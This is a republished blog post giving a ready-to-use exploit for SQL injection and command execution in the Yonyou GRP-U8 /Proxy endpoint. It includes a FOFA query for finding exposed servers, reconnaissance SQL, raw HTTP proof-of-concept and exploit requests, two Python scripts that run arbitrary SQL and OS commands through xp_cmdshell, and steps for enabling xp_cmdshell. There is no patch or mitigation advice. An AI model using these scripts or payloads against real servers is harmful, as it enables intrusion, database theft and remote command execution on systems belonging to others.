UF grp-u8SQL injection & command execution

Others 2021-03-30 06:36:05 views: null

UF grp-u8SQL injection & command execution

fofa search sentence title="GRP-U8"

1. Query version information: select @@version
2. Verify whether it is sa permission: select IS_SRVROLEMEMBER('sysadmin') //Returns 1, indicating that it is sa permission, and sql statement can be executed. 3. Determine whether there is an xp_cmdshellextended stored procedure in the MSSQL service of the target machine :
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' //As long as the returned result is not, 0it means there is an xp_cmdshellextended stored procedure.

  1. POC
POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache


cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS> </R9FUNCTION></R9PACKET>

Insert picture description here

#!/usr/bin/env python2
#coding:utf-8
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
if len(sys.argv) != 3:
    print "Usage: python poc.py url sql"
    sys.exit(1)
url = sys.argv[1]
sql = sys.argv[2]
headers = {
    
    
	"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
	"Content-Type":"application/x-www-form-urlencoded",
}
def poc(url,sql):
	url = url + '/Proxy'
	print url
	data = 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">'+sql+'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'
	res = requests.post(url,headers=headers,data=data)
	res = res.text
	result_row = r'<ROW COLUMN1="(.*?)"'
	ROW = re.findall(result_row,res,re.S | re.M)
	print '查询成功!'
	print ROW[0]
if __name__ == "__main__":
    poc(sys.argv[1],sys.argv[2])

Insert picture description here

  1. EXP
POST /Proxy HTTP/1.1
Accept: Accept: */*
Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;) Host: host
Content-Length: 357
Connection: Keep-Alive
Cache-Control: no-cache


cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION> <NAME>AS_DataRequest</NAME><PARAMS><PARAM> <NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM> <NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'dir'</DATA> </PARAM></PARAMS></R9FUNCTION></R9PACKET>

Insert picture description here

#!/usr/bin/env python2
#coding:utf-8
import re
import requests
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
if len(sys.argv) != 3:
    print "Usage: python exp.py url cmd"
    sys.exit(1)
url = sys.argv[1]
cmd = sys.argv[2]
headers = {
    
    
	"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
	"Content-Type":"application/x-www-form-urlencoded",
}
def exp(url,cmd):
	url = url+ '/Proxy'
	print url
	data = 'cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell \''+cmd+'\'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>'
	res = requests.post(url,headers=headers,data=data)
	res = res.text
	result_row = r'<ROW output="(.*?)" />'
	ROW = re.findall(result_row,res,re.S | re.M)
	print '命令执行成功!'
	for i in range(len(ROW)):
		print ROW[i]
if __name__ == "__main__":
    exp(sys.argv[1],sys.argv[2])

Insert picture description here

This is a pit stop
! ! ! ! If an error is reported, execute the commands one after the other, and then execute the system commands. ! ! !
Turn on cmdshell
USE master
RECONFIGURE - first perform a refresh, process the last configuration
EXEC sp_configure'show advanced options', 1 - enable advanced configuration of xp_cmdshell RECONFIGURE - refresh configuration
EXEC sp_configure'xp_cmdshell', 1 - open xp_cmdshell, You can call the command
RECONFIGURE outside the SQL system - refresh configuration

Guess you like

Origin blog.csdn.net/weixin_44146996/article/details/109863346
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com